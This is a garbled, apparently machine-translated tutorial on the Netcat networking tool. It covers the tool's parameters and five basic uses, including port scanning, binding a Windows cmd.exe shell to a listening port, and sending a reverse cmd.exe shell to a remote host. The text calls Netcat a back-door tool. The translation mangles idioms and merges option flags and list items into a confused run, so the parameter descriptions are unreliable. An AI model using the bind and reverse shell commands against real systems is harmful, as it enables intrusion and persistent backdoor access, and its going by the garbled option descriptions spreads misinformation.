Conservation: DEMONALEX Email: Demonalex_at_dark2s.org Reference: Original Hobbit and Chris Wysopal's Description Document, G-Python, Black Cat Sheriff, Quack, Zhoutree, etc., Netcat is known as the network security circle 'Switzerland Strokes', I believe that there is no one who doesn't know it ... a simple and useful tool that reads and write data by using a network connection using TCP or UDP protocol. It is designed to be a stable back door tool that can be easily driver directly from other programs and scripts. At the same time, it is also a powerful network debugging and detection tool that can build all types of network connections you need, and there are several very interesting built-in features (see the following method for details). In China, its Windows version has two versions, one is the original version written by original Chris Wysopal, and the other is the new 'concentration' version after the 'red and black'. The 'concentrated' version of the main program is only more than 10 KB (more than 10 KB NCs can't complete the fourth, fifth usage method described below, this function has the original NC seem to be 60kb: p), although "volume" "Small, but I have completed a lot of work.
============================================ ============================================================================================================================================================================================================= ========= software: tools name: Netcat author: Hobbit && Chris Wysopal URL: http: //www.atstake.com/research/tools/network_utilities/ category: open Source platform: Linux / BSD / UNIX / Windows Windows Under Version Number: [V1.10 Nt] ====================================== ============================================================================================================================================================================================================= =============== Parameter introduction: 'nc.exe -h' can see the use of each parameter.
Basic format: nc [-options] Hostname Port [S] [Ports] ... nc -l -p port [options] [HostName] [port] -d background mode - E PROG program redirection, once connected, [Danger !!] - G Gateway Source-Routing Hop Point [S], Up to 8-g Num Source-Routing Pointer: 4, 8, 12, ...- H Help Information - I SECS Delayed Space - L Listening mode, after the inbound connection -L connection is closed, continue to listen to the IP address of the specified number, can not use the HostName-O File record 16-based transmission -P port local port number -R Random local and remote ports -s addr local source address -t uses Telnet interactive mode -u udp mode -V detailed output - with two -V can get more detailed content -w second output Time -Z to turn off the input and output-used for The representation of the port when scan is written as the range format of the MN. ============================================================================================================================================================================================================= ============================================================================================================================================================================================================= = Basic Usage: Probably there are several usage: 1) Connect to Remote host, example: format: nc -nvv 192.168.xx 80 Explanation: Connection to 192.168.xx TCP80 Port 2) Monitor Local Host, Example: Format: NC -l -p 80: Monitor the TCP80 port 3 of this machine 3) Scan Remote Host, Example: Format: Nc -NVV -W2 -Z 192.168.xx 80-445 Explanation: Scan 192.168.xx's TCP80 to TCP445 all port 4 Remote host binding shell, example: format: nc -l -p 5354 -t -e c: /winnt/system32/cmd.exe explanation: Binding Remote host CMDshell at the REMOTE host TCP5354 port 5) Remote host tied SHELL and reverse connection, example: format: nc -t -e c: /winnt/system32/cmd.exe 192.168.xx 5354 explanation: Bind the CMDshell of the Remote host and reverse to 192.168.xx TCP5354 port or more For the most basic use (in fact, there are still many usage of NC, when the pipeline command "|" and redirect command "<", ">" and other command functions are more powerful ...).
